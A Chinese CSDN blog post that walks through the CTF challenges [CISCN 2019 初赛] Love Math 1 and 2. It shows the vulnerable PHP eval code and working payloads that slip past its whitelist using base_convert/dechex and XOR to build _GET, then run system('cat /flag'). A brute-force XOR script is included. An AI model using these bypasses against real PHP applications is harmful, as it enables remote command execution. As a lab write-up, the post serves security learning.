进制转换数学函数与PHP异或构造_GET之[CISCN 2019 初赛]Love Math1 2

已于 2022-08-08 22:20:55 修改
阅读量221 收藏
点赞数
分类专栏: CTF知识点 文章标签: jvm
于 2022-08-06 20:28:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58970968/article/details/126200088
版权

Love Math1

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

知识点:

1.动态函数;

什么是动态函数;举例:
 

$a = "system"
然后
$a("whoami") = system("whoami")

2.进制转换函数;

hex2bin() 函数

hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。

base_convert()函数能够在任意进制之间转换数字。比如可以将10进制转化为36进制;为什么是36进制呢?36进制代表数字0-9和小写字母a-z;这里可以利用它来转化得到其他数字或者小写字组成的函数比如hex2bin();

dechex()将10进制转化为16进制;

上面是知识点了;开始利用解决这道题;

我们最终需要构造出;

system(cat /flag)

这个命令;为什么是这个呢?最后的eval万能函数,把这个名令传入进去就会得到

eval(system(cat /flag))   ;

直接输入是肯定不行的;

那么就可以使用动态函数来链接它;

$_GET['a']($_GET['b'])&a=system&b=cat /flag

但是白名单里面只能有那几个函数;

那么就需要使用那些函数来构造出_GET ;

首先想到用hex2bin();

16进制转化为字符串;

_GET的16进制是5f474554

但是这里有一个问题,有函数过滤掉16进制;那么就用dechex将10进制转化为16进制,5f474554的10进制是1598506324

所以现在就有hex2bin(dechex(1598506324))=_GET

但是hex2bin又不在白名单中;所以我们采用base_convert() 10进制转化为36进制构造hex2bin

hex2bin  的10进制为37907361743

所以base_convert(37907361743,10,36) = hex2bin

一套操作下来就有:

base_convert(37907361743,10,36)(dechex(1598506324)) = _GET

最后payload:
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{exp})&abs=system&exp=cat /flag

详细参考:CTF -- [CISCN 2019 初赛]Love Math 1(php杂项)_Gh0st_1n_The_shell的博客-CSDN博客

 Love Math 2

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 60) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

这个比1少了转换字符的函数;那么就上终极大招:当然也可以直接用这个方法做第一题;

知识点:

PHP异或得到想要的字符串;很多的preg_match会过滤掉".",所以需要使用异或运算进行绕过,很多的免杀马都是这样制作的。php对字符进行异或运算是先将字符转换成ASCII码然后进行异或运算,并且php能直接对一串字符串进行异或运算,例如"123"^"abc"是"1"与"a"进行异或然后"2"与"b"进行异或,以此类推,在异或结束后就获得了想要的字符串。 

脚本:
 

<?php
//$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];


$payload =['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];

for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            if ($exp=='_G'||$exp=='_'||$exp=='_GE'||$exp=='_GET'||$exp=='E'||$exp=='ET'||$exp=='T'){
                echo($payload[$k]."^$i$j"."==>$exp");
                echo "\n";
            }
            //echo($payload[$k]."^$i$j"."==>$exp");
            //echo "\n";
        }
    }
}

 这个方法适用于第一题;看看运行结果:
 

is_finite^64==>_G
is_infinite^64==>_G
is_nan^64==>_G
mt_getrandmax^23==>_G
mt_rand^23==>_G
mt_srand^23==>_G
rad2deg^75==>ET
rand^75==>ET
tan^15==>ET
tanh^15==>ET
^00==>0

就可以利用这些来构造_GET ;

构造是需要注意,用 ‘ . ’来连接;

$pi=(mt_rand^(2).(3)).(tan^(1).(5));

//mt_rand^(2).(3)——>mt_rand^23==>_G

tan^(1).(5)——>tan^15==>ET

(_G).(ET)——>_GET

所以直接构造:
?c=$pi=(mt_rand^(2).(3)).(tan^(1).(5));$$pi{1}($$pi{2})&1=system&2=cat /flag

一只Traveler
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 字符串异或 绕过,CTF中php异或绕过preg_match
weixin_36073959的博客
03-19 3101
0x00:写在前面suctf的题目和强网杯都遇到这种类型题目了,正好就当做一个笔记来记录一下。$hhh= @$_GET[‘_‘];if(!$hhh){highlight_file(__FILE__);}if(strlen($hhh)>18){die(‘One inch long, one inch strong!‘);}if ( preg_match(‘/[\x00- 0-9A-Za-z\‘...
PHP异或
1stPeak's Blog
02-22 5649
PHP异或流程: 在PHP中,两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。 异或运算法则: 0&0=0;1&1=0;0&1=1;1&0=1 两个二进制数相同时,异或为0,不同为1 例:php中的字符串A和字符串? <?...
[CISCN 2019 初赛]Love Math
m0_63253040的博客
09-24 163
这里思路是利用最下面的eval去执行读取flag的命令,但是payload长度不能超过80,且只能用白名单内的函数,不能使用黑名单内的字符。即$_GET['test']&test=system('ls /'),又因为[]和引号被过滤了所以用两个变量构造。base_convert(37907361743,10,36)相当于hex2bin,可以将16进制转换为字符串。读取flag,我们要system('ls /'),正常是无法构造的,所以需要借用变量构造。GET我们用白名单内的base_convert绕过。
nssctf web 入门(7)
qq_61988806的博客
04-17 548
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
BUU刷题记录——5
weixin_43610673的博客
09-21 1503
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
mysql %3cforeach_RCTF 2020 Writeup
weixin_29119497的博客
01-27 2316
来啦!今天也是活力满满的工作日小编WEBcalc解题思路error_reporting ( 0 );if(!isset( $_GET [ 'num' ])){show_source ( __FILE__ );}else{$str = $_GET [ 'num' ];$blacklist = [ '[a-z]' , '[\x7f-\xff]' , '\s' , "'" , '"' , ...
0x_xor.rar_16进制异或_XOR_vc 16进制异或_异或解密
07-15
把string的16进制数字异或后输出,比较方便实现加密和解密
xor.rar_4 3 2 1_XOR_异或运算_按位异或
09-19
最大的异或 题目描述:给你n个正整数,你要找出哪两个数按位异或运算后的结果是最大的。 输入:输入一个整数n(2<=n<=100000),然后就是n个109以内的正整数。 输出:输出最大的按位异或运算结果。 样例...
CZF算法库-进制转换-校验.rar_校验_进制转换
09-23
在IT领域,进制转换和校验是两个重要的概念,广泛应用于数据处理、通信系统以及存储系统的安全性验证。本文将详细解析"BCD转十进制"、"十进制转BCD"、"CRC校验"和"XOR校验"这四个核心知识点,并结合"CZF算法库-进制...
XOR_caculater.rar_labview计算器_xor 校验和_异或校验_异或运算_欧姆龙 labview
07-15
在标题和描述中提到的“XOR_caculater.rar_labview计算器_xor 校验和_异或校验_异或运算_欧姆龙 labview”,主要涉及到LabVIEW中实现的异或(XOR)运算,以及它在通信中的应用,特别是与欧姆龙CP1H PLC的交互。...
十六进制字符串按位异或校验和和校验工具
10-22
3. 最终,所有的异或结果会汇聚成一个单一的二进制数,转换为十六进制形式后,就是校验和。 这种校验方法的原理基于这样一个事实:对于任何数据,其本身与自身的异或结果总是0。因此,如果数据在传输过程中没有改变...
SQL花式延时/布尔注入与PHP白名单函数利用方法
publicStr的博客
04-26 1225
0x01 冗长的前奏: 来源于两道CTF题目,引发自闭中的一点点思考。 想中止这一切菜鸡的挣扎。 (顺便分享一篇大佬的SQL注入文章https://blog.csdn.net/nzjdsds/article/details/86767711) 0x02 CTF中的强行时间盲注 2-1题目情况: 2-2题目思路 先尝试常规方法 ...
BUUCTF web3
qq_61768489的博客
05-16 972
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到源码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
题目总结 web 51-100
羽的博客
04-28 4017
0x051 [BJDCTF2020]Mark loves cat 知识点: a=b&c=d foreach($_POST as $x => $y){ echo $x; echo "</br>"; echo $y; echo "</br>"; } 将输出 a b c d 0x052[BJDCTF 2nd]Schrödinger 修改...
BUUCTF-社团考核
qq_60905276的博客
09-24 1077
BUUCTF上面的题
2019第十二届全国大学生信息安全竞赛部分WriteUp
极光时流
04-22 4446
第十二届全国大学生信息安全竞赛WriteUp0x00 签到题0x01 SALEAE0x02 24c0x03 easyG00x04 JustSoso0x05 puzzles0x06 usbasp0x07 warmup0x08 love_math0x09 bbvvmm0x10 baby_pwn 0x00 签到题 操作内容: 下载链接,解压并运行软件,对准两个聚焦圆圈,控制台回车输出 flag 0x01...
2021-7-23 [CISCN 2019 初赛]Love Math 知识点:PHP函数的灵活运用 base_convert getallheaders
m0_51326092的博客
07-23 137
文章目录前言一、前置知识二、解题过程总结 前言 今天做到了一个有趣的题目,是对PHP函数的灵活运用,灵活转码,达到绕过设置的黑白名单的目的,实现命令的执行,总之题目很灵活o(╥﹏╥)o给虐哭了,看了大佬们的博客才懂得灵活运用一些神奇的函数,还有最多有三十六进制,所以有些进制会带有字母,所以造成了漏洞啊!!! 一、前置知识 先附上一些wp: 大佬博客讲解1 大佬博客讲解2 大佬博客讲解3 好用的网址: 任意进制的转换 一些函数: base_convert(number,frombase,tobase);:
buuctf日记 [CISCN 2019 初赛]Love Math 1
weixin_45642610的博客
03-06 336
buuctf日记 [CISCN 2019 初赛]Love Math 1 payload c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat /flag base_convert(37907361743,10,36) #把十进制数“37907361743”转为36进制(0-9,a-z) base_convert(37907361743,10,3
ciscn_2019_c_1
最新发布
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值